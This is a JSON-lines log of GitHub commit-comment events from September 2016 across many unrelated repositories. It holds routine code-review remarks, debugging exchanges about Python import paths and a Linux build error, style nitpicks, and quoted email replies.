{"id":"4631023270","type":"CommitCommentEvent","actor":{"login":"snim2"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208109,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:27:38Z","updated_at":"2016-09-28T14:27:38Z","body":"I'm not sure what this commit does. The original code added the `warmup` directory to the `PYTHONPATH`, this commit looks like it adds the `bin` directory to the path. Is that the intention?"}},"created_at":"2016-09-28T14:27:38Z"}
{"id":"4631025756","type":"CommitCommentEvent","actor":{"login":"mglukhikh"},"repo":{"name":"stprost/KotlinAsFirst2016"},"payload":{"comment":{"id":19208118,"position":5,"line":136,"path":"src/lesson3/task1/Loop.kt","commit_id":"01a01be45996e12bc1ef9ce619874a3db304b3a1","created_at":"2016-09-28T14:28:00Z","updated_at":"2016-09-28T14:28:00Z","body":"Степен, у вас пока не создано ни одного Pull Request. Пожалуйста, сделайте это. Инструкция находится вот здесь: https://github.com/Kotlin-Polytech/KotlinAsFirst2016/blob/master/tutorial/chapter00.adoc в разделе про учебный проект. Будут вопросы -- пишите."}},"created_at":"2016-09-28T14:28:00Z"}
{"id":"4631025866","type":"CommitCommentEvent","actor":{"login":"yuan78"},"repo":{"name":"yinqiwen/gsnova"},"payload":{"comment":{"id":19208119,"position":null,"line":null,"path":null,"commit_id":"54e857c7c7e1b7996f88d075b0b1ec2a9d1d2361","created_at":"2016-09-28T14:28:01Z","updated_at":"2016-09-28T14:28:01Z","body":"OK! The VPS mode works well now, THX!"}},"created_at":"2016-09-28T14:28:01Z"}
{"id":"4631027183","type":"CommitCommentEvent","actor":{"login":"Workgood"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19208126,"position":null,"line":null,"path":null,"commit_id":"9920f92a1fe354d52884c49fbb32144bf5b1389b","created_at":"2016-09-28T14:28:11Z","updated_at":"2016-09-28T14:28:11Z","body":"Good idea! But I don't know how create list of objects type date"}},"created_at":"2016-09-28T14:28:11Z"}
{"id":"4631029824","type":"CommitCommentEvent","actor":{"login":"Nyameri"},"repo":{"name":"Nyameri/widowschat"},"payload":{"comment":{"id":19208133,"position":null,"line":null,"path":null,"commit_id":"bd03ec895dfe0bf055f5fd4d70875dd71066d53e","created_at":"2016-09-28T14:28:35Z","updated_at":"2016-09-28T14:28:35Z","body":"![screen shot 2016-09-28 at 13 02 51](https://cloud.githubusercontent.com/assets/21335175/18917410/7d85cfc4-85a0-11e6-9d27-844e5ee4d052.png)\r\n"}},"created_at":"2016-09-28T14:28:35Z"}
{"id":"4631029877","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208134,"position":38,"line":39,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:28:36Z","updated_at":"2016-09-28T14:28:36Z","body":"Like the unit identifier after the zero above, this is another big debate between what is the best way to handle.  It's another personal choice.  After researching the various arguments online, I personally use `id=\"content\" class=\"content\"` and only use class selectors in the CSS file.  I just commented it here so you would be aware of this debate.  \r\n\r\n[Research links](https://www.google.com/search?q=github+remove+atom+as+editor&rlz=1C1CHBD_enUS689US689&oq=github+remove+atom+as+editor&aqs=chrome..69i57j69i64.4303j0j1&sourceid=chrome&ie=UTF-8#newwindow=1&q=css+using+ids+in+selectors)"}},"created_at":"2016-09-28T14:28:36Z"}
{"id":"4631032777","type":"CommitCommentEvent","actor":{"login":"ssharba"},"repo":{"name":"MwMaki/hw6"},"payload":{"comment":{"id":19208137,"position":null,"line":null,"path":null,"commit_id":"df0990f8e913737a59d8f4dc6967c74e9f95ef41","created_at":"2016-09-28T14:29:02Z","updated_at":"2016-09-28T14:29:02Z","body":"No .docx file accepted."}},"created_at":"2016-09-28T14:29:02Z"}
{"id":"4631033018","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterSamples/Chatter"},"payload":{"comment":{"id":19208138,"position":12,"line":34,"path":"ViewModels/ChatGroupPage.json.cs","commit_id":"aee69f94620917ddf892973dc5aedfd9ea418ac2","created_at":"2016-09-28T14:29:04Z","updated_at":"2016-09-28T14:29:04Z","body":"I just copy pasted the previous code that was removed (accidentaly?) in https://github.com/StarcounterSamples/Chatter/commit/1bb53172a71235ac569ef22428b39051beb35fa7\r\n\r\nBut I agree, I will fix this."}},"created_at":"2016-09-28T14:29:04Z"}
{"id":"4631034746","type":"CommitCommentEvent","actor":{"login":"ssharba"},"repo":{"name":"MwMaki/hw6"},"payload":{"comment":{"id":19208146,"position":null,"line":null,"path":null,"commit_id":"df0990f8e913737a59d8f4dc6967c74e9f95ef41","created_at":"2016-09-28T14:29:18Z","updated_at":"2016-09-28T14:29:18Z","body":"also whey .rar?"}},"created_at":"2016-09-28T14:29:18Z"}
{"id":"4631035028","type":"CommitCommentEvent","actor":{"login":"wesleywiser"},"repo":{"name":"OneDrive/onedrive-sdk-csharp"},"payload":{"comment":{"id":19208147,"position":23,"line":23,"path":"src/OneDriveSdk/Requests/Generated/ISharedWithMeCollectionPage.cs","commit_id":"eb576161e872ebe1eada0c327d6864e75e3148bd","created_at":"2016-09-28T14:29:21Z","updated_at":"2016-09-28T14:29:21Z","body":"Did you generate this file from a tool? It looks like the other files in this directory are all tool generated."}},"created_at":"2016-09-28T14:29:21Z"}
{"id":"4631037610","type":"CommitCommentEvent","actor":{"login":"PeterJCC"},"repo":{"name":"cloudcompare/trunk"},"payload":{"comment":{"id":19208152,"position":21,"line":1495,"path":"libs/qCC_db/ccPointCloud.cpp","commit_id":"2d1c68392ce79535ec045dfa7c9290040ff2cb58","created_at":"2016-09-28T14:29:41Z","updated_at":"2016-09-28T14:29:41Z","body":"**@davidcaron Frequency input was replaced with Period input. Now when \nyou say 0.2 then rainbow colouring up will repeat every 0.2 (mm).\n\nIt is better to say that rainbow banding period is repeating every 0.2 \nunits.\n\nOriginally it took min and max of each cloud independently and it was \nsplitted to 5 bands. Each one with different colouring spacing. But when \nyou had two clouds which were nearly same (but there min and max were \ndifferent) then colour of clouds was not same. We are using CC to view \nmore clouds overlaying each other and then colour banding were not \nworking for us.\n\nTake one cloud. Split it in half by XY plane. Colour up both of them by \nFrequency 5. Colour banding will not be same as you will do it on \noriginal cloud. With #436 modification it will work sell.\n*\n*On 2016-09-27 15:06, davidcaron wrote:\n>\n> In v2.7, the user would insert a frequency of 5, while in v2.8, it \n> would need to be 0.2 to get the same result. Is this the intent?\n>\n> Also, currently in the ui, it's not possible to insert a double value \n> for |freq|. Only an int.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/cloudcompare/trunk/commit/2d1c68392ce79535ec045dfa7c9290040ff2cb58#commitcomment-19191204>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/APDgEZPIwsVN6L0uLg875DV7hnhcbGdSks5quSLrgaJpZM4KHtXh>.\n>\n\n"}},"created_at":"2016-09-28T14:29:41Z"}
{"id":"4631038964","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208155,"position":51,"line":126,"path":"src/PrimeTower.cpp","commit_id":"afd91bfd2e790c74e90f584eb9c10ae064b94ab9","created_at":"2016-09-28T14:29:54Z","updated_at":"2016-09-28T14:29:54Z","body":"Yeah well..."}},"created_at":"2016-09-28T14:29:54Z"}
{"id":"4631039690","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208157,"position":64,"line":180,"path":"src/PrimeTower.cpp","commit_id":"afd91bfd2e790c74e90f584eb9c10ae064b94ab9","created_at":"2016-09-28T14:30:00Z","updated_at":"2016-09-28T14:30:00Z","body":"Ah well..."}},"created_at":"2016-09-28T14:30:00Z"}
{"id":"4631042590","type":"CommitCommentEvent","actor":{"login":"Nyameri"},"repo":{"name":"Nyameri/widowschat"},"payload":{"comment":{"id":19208161,"position":null,"line":null,"path":null,"commit_id":"bd03ec895dfe0bf055f5fd4d70875dd71066d53e","created_at":"2016-09-28T14:30:23Z","updated_at":"2016-09-28T14:30:23Z","body":"https://www.jotform.com//?formID=62631359577566"}},"created_at":"2016-09-28T14:30:23Z"}
{"id":"4631043131","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208164,"position":8,"line":26,"path":"src/PrimeTower.h","commit_id":"1a2ba63c748eca0d82f04ab3eccdedb089260d8a","created_at":"2016-09-28T14:30:27Z","updated_at":"2016-09-28T14:30:27Z","body":"Yeah"}},"created_at":"2016-09-28T14:30:27Z"}
{"id":"4631043342","type":"CommitCommentEvent","actor":{"login":"TJScalzo"},"repo":{"name":"team178/team178.github.io"},"payload":{"comment":{"id":19208165,"position":null,"line":null,"path":null,"commit_id":"38f7e6bc154e392359a8d7b43d0911367ae0823d","created_at":"2016-09-28T14:30:29Z","updated_at":"2016-09-28T14:30:29Z","body":"The commit message turned out weird. It was this:\r\n\r\n\"Added `noscript` tags for js-required elements.\""}},"created_at":"2016-09-28T14:30:29Z"}
{"id":"4631045871","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208170,"position":121,"line":124,"path":"piccini_c/tribute/tribute.css","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:30:47Z","updated_at":"2016-09-28T14:30:47Z","body":"Instead of using the cross image in the html on everyy line, you can actually use the cross image as the bullet.. kinda...  This is actually just making the image the background of the `li` without repeating the image.  This is a great solution for a few reasons.\r\n\r\n- The HTML file is now smaller.\r\n- You can change the image on all bullets but just changing one line of code\r\n- You have more control with less coding"}},"created_at":"2016-09-28T14:30:47Z"}
{"id":"4631046168","type":"CommitCommentEvent","actor":{"login":"blackio"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19208172,"position":null,"line":null,"path":null,"commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-28T14:30:50Z","updated_at":"2016-09-28T14:30:50Z","body":"@ademaro спасибо за разбор кода и комментарии по существу!"}},"created_at":"2016-09-28T14:30:50Z"}
{"id":"4631046963","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":19208173,"position":null,"line":null,"path":null,"commit_id":"472fb5e0b73ef9c88d19bcbcfc0f0548c244114d","created_at":"2016-09-28T14:30:56Z","updated_at":"2016-09-28T14:30:56Z","body":"Good thing I kept a copy, I was planning on using this to teach Adam some basics."}},"created_at":"2016-09-28T14:30:56Z"}
{"id":"4631048269","type":"CommitCommentEvent","actor":{"login":"rosenk"},"repo":{"name":"tekul/broch"},"payload":{"comment":{"id":19208178,"position":36,"line":89,"path":"broch-server/broch.hs","commit_id":"f6569e9c1707dad7ac905dee3f21eab32f4afad8","created_at":"2016-09-28T14:31:07Z","updated_at":"2016-09-28T14:31:07Z","body":"\"...identifiers)\" without \"(\""}},"created_at":"2016-09-28T14:31:07Z"}
{"id":"4631048340","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208179,"position":8,"line":26,"path":"src/PrimeTower.h","commit_id":"1a2ba63c748eca0d82f04ab3eccdedb089260d8a","created_at":"2016-09-28T14:31:08Z","updated_at":"2016-09-28T14:31:08Z","body":"I understand the confusion. Fixed."}},"created_at":"2016-09-28T14:31:08Z"}
{"id":"4631051147","type":"CommitCommentEvent","actor":{"login":"cfbolz"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208187,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:31:30Z","updated_at":"2016-09-28T14:31:30Z","body":"Well, it didn't work before :-). Adding the ``warmup/`` directory is wrong, because ``warmup/`` is a package (``warmup/__init__.py`` exists, and the code imports ``warmup.krun_results``). The current code calls ``dirname`` twice, so it adds the toplevel dir to the path, so that the ``warmup`` package is found."}},"created_at":"2016-09-28T14:31:30Z"}
{"id":"4631051789","type":"CommitCommentEvent","actor":{"login":"srikanthkama2"},"repo":{"name":"SriRamaHanuma/Selinium"},"payload":{"comment":{"id":19208192,"position":null,"line":null,"path":null,"commit_id":"42581cbad3aad57ead9ff4a42af4f05fb7f9a640","created_at":"2016-09-28T14:31:36Z","updated_at":"2016-09-28T14:31:36Z","body":"Selimium basic programs.."}},"created_at":"2016-09-28T14:31:36Z"}
{"id":"4631052869","type":"CommitCommentEvent","actor":{"login":"WasabiFan"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19208195,"position":null,"line":null,"path":null,"commit_id":"9b8deb404d61a392743fd0c0ef7c5ba3476a0444","created_at":"2016-09-28T14:31:44Z","updated_at":"2016-09-28T14:31:44Z","body":"Ummm... That's in an autogen block, so it will be overwritten the next time we update something in the API."}},"created_at":"2016-09-28T14:31:44Z"}
{"id":"4631053553","type":"CommitCommentEvent","actor":{"login":"Maninandha"},"repo":{"name":"Maninandha/Simply"},"payload":{"comment":{"id":19208199,"position":null,"line":null,"path":null,"commit_id":"d83975b33082d24468ba1489ede92aabd6396b6d","created_at":"2016-09-28T14:31:49Z","updated_at":"2016-09-28T14:31:49Z","body":"simply created"}},"created_at":"2016-09-28T14:31:49Z"}
{"id":"4631057507","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208208,"position":15,"line":15,"path":"app/controllers/users_controller.rb","commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:32:22Z","updated_at":"2016-09-28T14:32:22Z","body":"インデントを半角空白2文字に修正せよ"}},"created_at":"2016-09-28T14:32:22Z"}
{"id":"4631058586","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208211,"position":5,"line":166,"path":"src/utils/intpoint.h","commit_id":"04dc8ac68b35c1fbd4ed4cd0c7ca5456bd132eb4","created_at":"2016-09-28T14:32:31Z","updated_at":"2016-09-28T14:32:31Z","body":"Maybe I should change this whole file then.\r\nI don't like to break style with the rest of this file.\r\n\r\nAlso these are really small functions and I find it nice to have this code this concise."}},"created_at":"2016-09-28T14:32:31Z"}
{"id":"4631059904","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208213,"position":1,"line":1,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:32:43Z","updated_at":"2016-09-28T14:32:43Z","body":"Sorry, ignore this line!  I had just added it for my testing and forgot to remove it before putting the code onto GitHub.\r\n\r\nThis code is harder to see all the changes I made because I moved everything around at least a little.  Sorry about that!  Any questions, please just ask!"}},"created_at":"2016-09-28T14:32:43Z"}
{"id":"4631060142","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19208215,"position":68,"line":68,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/BaseMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-28T14:32:45Z","updated_at":"2016-09-28T14:32:45Z","body":"I suppose there is a little performance/memory overhead, but the main reason from my point of view is the code readability. I suppose any contributors/committer which will modify this code later, will ask themself why we need an atomicboolean and a synchronized block. This is bit confusing."}},"created_at":"2016-09-28T14:32:45Z"}
{"id":"4631061009","type":"CommitCommentEvent","actor":{"login":"snim2"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208219,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:32:52Z","updated_at":"2016-09-28T14:32:52Z","body":"Well, these scripts have always worked for me! Was it because I was running them from the root directory of the project? Anyhow, if we are happy that this is an improvement, we probably want to make the same change in all the scripts."}},"created_at":"2016-09-28T14:32:52Z"}
{"id":"4631061095","type":"CommitCommentEvent","actor":{"login":"phlegx"},"repo":{"name":"kamlim1k/redmine_gitlab_hook"},"payload":{"comment":{"id":19208222,"position":null,"line":null,"path":null,"commit_id":"84d4bb0b1cdef779da4a7a277eef312a795deb8a","created_at":"2016-09-28T14:32:53Z","updated_at":"2016-09-28T14:32:53Z","body":"Hi! Please make a pull request and we merge this code to the gem."}},"created_at":"2016-09-28T14:32:53Z"}
{"id":"4631062261","type":"CommitCommentEvent","actor":{"login":"gunthercox"},"repo":{"name":"gunthercox/ChatterBot"},"payload":{"comment":{"id":19208223,"position":null,"line":null,"path":null,"commit_id":"e0508f84268014653588dcbdd3ee22b341178012","created_at":"2016-09-28T14:33:04Z","updated_at":"2016-09-28T14:33:04Z","body":"@rmdort There are still a few things that need to be finished before this can be merged. I believe they are mainly just adding unit tests and writing documentation for the new adapter."}},"created_at":"2016-09-28T14:33:04Z"}
{"id":"4631062464","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19208224,"position":null,"line":null,"path":null,"commit_id":"9b8deb404d61a392743fd0c0ef7c5ba3476a0444","created_at":"2016-09-28T14:33:07Z","updated_at":"2016-09-28T14:33:07Z","body":"Ah, that complicates things"}},"created_at":"2016-09-28T14:33:07Z"}
{"id":"4631062572","type":"CommitCommentEvent","actor":{"login":"philippebolduc"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":19208225,"position":null,"line":null,"path":null,"commit_id":"847323fbedefda7376530bd2e3e13cae87fa9b38","created_at":"2016-09-28T14:33:08Z","updated_at":"2016-09-28T14:33:08Z","body":"Is that ok ?\n\n\nThanks\n\nPhilippe Bolduc\nAdministrateur système Linux / Programmeur analyste\nLinux System Administrator / Programmer Analyst\n\n<http://www.florenceinc.com/>\n3382, boul. Industriel\nLaval (Québec)\nH7L 4R9\nT :: 514-875-7525 #235\nF :: 514-875-7536\nC :: philippe@florenceinc.com\nW :: florenceinc.com\nLe 2016-09-28 à 10:12, Johannes Meixner a écrit :\n>\n> @philippebolduc <https://github.com/philippebolduc>\n> can you do a GitHub pull request for your intended changes\n> so that we can see what you actually like to have changed.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/rear/rear/commit/847323fbedefda7376530bd2e3e13cae87fa9b38#commitcomment-19207858>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AJuhY9EgmyOjBabDJMJUE3fsonFLQO4yks5qunXAgaJpZM4KI2mY>.\n>\n\n"}},"created_at":"2016-09-28T14:33:08Z"}
{"id":"4631063173","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208226,"position":3,"line":3,"path":"app/helpers/users_helper.rb","commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:33:13Z","updated_at":"2016-09-28T14:33:13Z","body":"インデントがおかしい。修正を。"}},"created_at":"2016-09-28T14:33:13Z"}
{"id":"4631063235","type":"CommitCommentEvent","actor":{"login":"CoDanny"},"repo":{"name":"becvert/cordova-plugin-zeroconf"},"payload":{"comment":{"id":19208231,"position":null,"line":null,"path":null,"commit_id":"52136071a77cfaec4430bfa531a9d78a362340d3","created_at":"2016-09-28T14:33:14Z","updated_at":"2016-09-28T14:33:14Z","body":"Is there a plan to make this into a new release 1.1.3? or are you waiting for more changes?"}},"created_at":"2016-09-28T14:33:14Z"}
{"id":"4631063884","type":"CommitCommentEvent","actor":{"login":"Lilyheart"},"repo":{"name":"MontCode/code_review"},"payload":{"comment":{"id":19208233,"position":7,"line":6,"path":"piccini_c/tribute/tribute.html","commit_id":"cd557037fc398f360472861bcb2314c98515e582","created_at":"2016-09-28T14:33:20Z","updated_at":"2016-09-28T14:33:20Z","body":"Placing the ul on it's own line helps with being able to see all nesting of the the code easier."}},"created_at":"2016-09-28T14:33:20Z"}
{"id":"4631064095","type":"CommitCommentEvent","actor":{"login":"ImJezze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19208235,"position":null,"line":null,"path":null,"commit_id":"d7a9eeb64ff8f2388acb975968b32e2c3735dde2","created_at":"2016-09-28T14:33:22Z","updated_at":"2016-09-28T14:33:22Z","body":"Thanks for the fix, but I don't understand what the continuous-integration is doing here. Why is there a cast to double?\r\n\r\nfloor(((double)(shadersys->shaders::curr_poly->poly_info::prim_width() + 5.0e-1f)))\r\n\r\nThe official build tools under Windows don't throw errors like that."}},"created_at":"2016-09-28T14:33:22Z"}
{"id":"4631067464","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"rhempel/ev3dev-lang-python"},"payload":{"comment":{"id":19208245,"position":null,"line":null,"path":null,"commit_id":"9b8deb404d61a392743fd0c0ef7c5ba3476a0444","created_at":"2016-09-28T14:33:51Z","updated_at":"2016-09-28T14:33:51Z","body":"No, it does not. Will push the fix in a minute"}},"created_at":"2016-09-28T14:33:51Z"}
{"id":"4631067792","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208246,"position":35,"line":182,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T14:33:54Z","updated_at":"2016-09-28T14:33:54Z","body":"fixed"}},"created_at":"2016-09-28T14:33:54Z"}
{"id":"4631068493","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208248,"position":7,"line":14,"path":"app/views/layouts/application.html.erb","commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:34:00Z","updated_at":"2016-09-28T14:34:00Z","body":"インデントがおかしい。修正を。"}},"created_at":"2016-09-28T14:34:00Z"}
{"id":"4631069418","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208250,"position":13,"line":20,"path":"app/views/layouts/application.html.erb","commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:34:08Z","updated_at":"2016-09-28T14:34:08Z","body":"インデントがおかしい。修正を。"}},"created_at":"2016-09-28T14:34:08Z"}
{"id":"4631070022","type":"CommitCommentEvent","actor":{"login":"gunthercox"},"repo":{"name":"gunthercox/ChatterBot"},"payload":{"comment":{"id":19208251,"position":null,"line":null,"path":null,"commit_id":"5a49cf49f5df2e7ecd63a09bd1dd3072342e0db0","created_at":"2016-09-28T14:34:13Z","updated_at":"2016-09-28T14:34:13Z","body":"Nope, sorry. Still working on it."}},"created_at":"2016-09-28T14:34:13Z"}
{"id":"4631070732","type":"CommitCommentEvent","actor":{"login":"satishgoda"},"repo":{"name":"satishgoda/Maya"},"payload":{"comment":{"id":19208254,"position":12,"line":12,"path":"sandbox/asQtObject/scriptEditor/QSplitter_widget_swap.py","commit_id":"a6134ba1d09e222408c61d6abff86b72b10eec60","created_at":"2016-09-28T14:34:18Z","updated_at":"2016-09-28T14:34:18Z","body":"http://doc.qt.io/qt-4.8/qsplitter.html"}},"created_at":"2016-09-28T14:34:18Z"}
{"id":"4631072124","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19208261,"position":57,"line":217,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T14:34:30Z","updated_at":"2016-09-28T14:34:30Z","body":"Yeah good point about the bonus brackets."}},"created_at":"2016-09-28T14:34:30Z"}
{"id":"4631073814","type":"CommitCommentEvent","actor":{"login":"phlegx"},"repo":{"name":"wraithbb/redmine_gitlab_hook"},"payload":{"comment":{"id":19208267,"position":null,"line":null,"path":null,"commit_id":"e49ac30f43555d3e492b1bc9f6b09a95225342bb","created_at":"2016-09-28T14:34:45Z","updated_at":"2016-09-28T14:34:45Z","body":"Hi! Please make a pull request and we merge this code to the gem."}},"created_at":"2016-09-28T14:34:45Z"}
{"id":"4631075429","type":"CommitCommentEvent","actor":{"login":"npomfret"},"repo":{"name":"rt2zz/react-native-contacts"},"payload":{"comment":{"id":19208271,"position":null,"line":null,"path":null,"commit_id":"15ff1686e0437bf3e72fb92c9d5dbaf50c7daef4","created_at":"2016-09-28T14:34:59Z","updated_at":"2016-09-28T14:34:59Z","body":"I'm a little concerned about this change because the equivalent iOS code crashes if the address book has a _large_ number of contacts with photos.  I've had to make a branch and comment out the code that copies the contact images into the tmp dir, otherwise my app (and anyones app) simply won't work.\r\n\r\n\r\nHas this been tested on a large address book with contacts that have images?"}},"created_at":"2016-09-28T14:34:59Z"}
{"id":"4631076230","type":"CommitCommentEvent","actor":{"login":"cfbolz"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208273,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:35:06Z","updated_at":"2016-09-28T14:35:06Z","body":"Hm, indeed, they all don't work for me:\r\n\r\n```\r\nwarmup_experiment$ ./bin/calculate_outliers_by_threshold \r\nTraceback (most recent call last):\r\n  File \"./bin/calculate_outliers_by_threshold\", line 10, in <module>\r\n    from warmup.krun_results import read_krun_results_file\r\nImportError: No module named warmup\r\n```"}},"created_at":"2016-09-28T14:35:06Z"}
{"id":"4631076304","type":"CommitCommentEvent","actor":{"login":"marcperrin"},"repo":{"name":"nijel/weblate"},"payload":{"comment":{"id":19208274,"position":null,"line":null,"path":null,"commit_id":"52e5fd85e5d111025eca7d5ac44cddc3c638de1e","created_at":"2016-09-28T14:35:07Z","updated_at":"2016-09-28T14:35:07Z","body":"Hello,\r\n\r\nOh yes I'd noticed that issue!\r\n\r\nOn a very similar subject, it's a minor issue but what do you think about avoiding to display a rounded 0.0% or 100.0%?\r\n(NB: issue only becomes apparent when you have a few thousands units in a component)\r\ni.e. returning a deliberately wrong rounding for such cases - so (unless going for a more elegant solution?) a tweak like:\r\n```diff\r\n def translation_percent(translated, total):\r\n     '''\r\n     Returns translation percentage.\r\n     '''\r\n-    return round(1000 * translated / total) / 10.0\r\n+    perc = round(1000 * translated / total) / 10.0\r\n+    # Avoid displaying misleading rounded 0.0% or 100.0%\r\n+    if perc == 0.0 and translated != 0:\r\n+        return 0.1\r\n+    if perc == 100.0 and translated != total:\r\n+        return 99.9\r\n+    return perc\r\n```\r\n \r\n\r\nThanks,\r\n\r\nMarc\r\n\r\n"}},"created_at":"2016-09-28T14:35:07Z"}
{"id":"4631083000","type":"CommitCommentEvent","actor":{"login":"Tacx"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19208300,"position":null,"line":null,"path":null,"commit_id":"12e9ac03f1db5f007bb8f12abc33abef05546194","created_at":"2016-09-28T14:36:03Z","updated_at":"2016-09-28T14:36:03Z","body":"Hey, \r\n\r\nI get a build error on linux\r\n\r\nIn file included from /root/mangos/src/shared/Util.cpp:22:0:\r\n/root/mangos/src/shared/TSS.h:61:33: error: ‘sp_dereference’ in namespace ‘boost::detail’ does not name a type\r\n/root/mangos/src/shared/TSS.h:61:47: error: expected unqualified-id before ‘<’ token\r\n[ 10%] Building CXX object src/shared/CMakeFiles/shared.dir/Threading.cpp.o\r\nmake[2]: *** [src/shared/CMakeFiles/shared.dir/Util.cpp.o] Error 1\r\nmake[2]: *** Waiting for unfinished jobs....\r\nmake[1]: *** [src/shared/CMakeFiles/shared.dir/all] Error 2\r\nmake: *** [all] Error 2\r\n\r\n"}},"created_at":"2016-09-28T14:36:03Z"}
{"id":"4631085102","type":"CommitCommentEvent","actor":{"login":"snim2"},"repo":{"name":"softdevteam/warmup_experiment"},"payload":{"comment":{"id":19208307,"position":null,"line":null,"path":null,"commit_id":"4e1bb14a9ad1b54f63f063a7b535a9b1b3dc5e09","created_at":"2016-09-28T14:36:20Z","updated_at":"2016-09-28T14:36:20Z","body":"Strange:\r\n\r\n```python\r\n$ python --version\r\nPython 2.7.12\r\n\r\n$ ./bin/calculate_outliers_by_threshold --help\r\nusage: calculate_outliers_by_threshold [-h] json_files [json_files ...]\r\n\r\npositional arguments:\r\n  json_files  One or more Krun result files.\r\n\r\noptional arguments:\r\n  -h, --help  show this help message and exit\r\n```"}},"created_at":"2016-09-28T14:36:20Z"}
{"id":"4631085118","type":"CommitCommentEvent","actor":{"login":"becvert"},"repo":{"name":"becvert/cordova-plugin-zeroconf"},"payload":{"comment":{"id":19208308,"position":null,"line":null,"path":null,"commit_id":"52136071a77cfaec4430bfa531a9d78a362340d3","created_at":"2016-09-28T14:36:20Z","updated_at":"2016-09-28T14:36:20Z","body":"it's already been published to npm"}},"created_at":"2016-09-28T14:36:20Z"}
{"id":"4631088025","type":"CommitCommentEvent","actor":{"login":"motorkey"},"repo":{"name":"Atsukyyy/sample_app"},"payload":{"comment":{"id":19208319,"position":6,"line":6,"path":"app/views/users/show.html.erb","commit_id":"8a97e6dc03ce4e27b78d8c49af3f423f36ae7ef4","created_at":"2016-09-28T14:36:46Z","updated_at":"2016-09-28T14:36:46Z","body":"この変数行インデントがおかしい。修正を。"}},"created_at":"2016-09-28T14:36:46Z"}
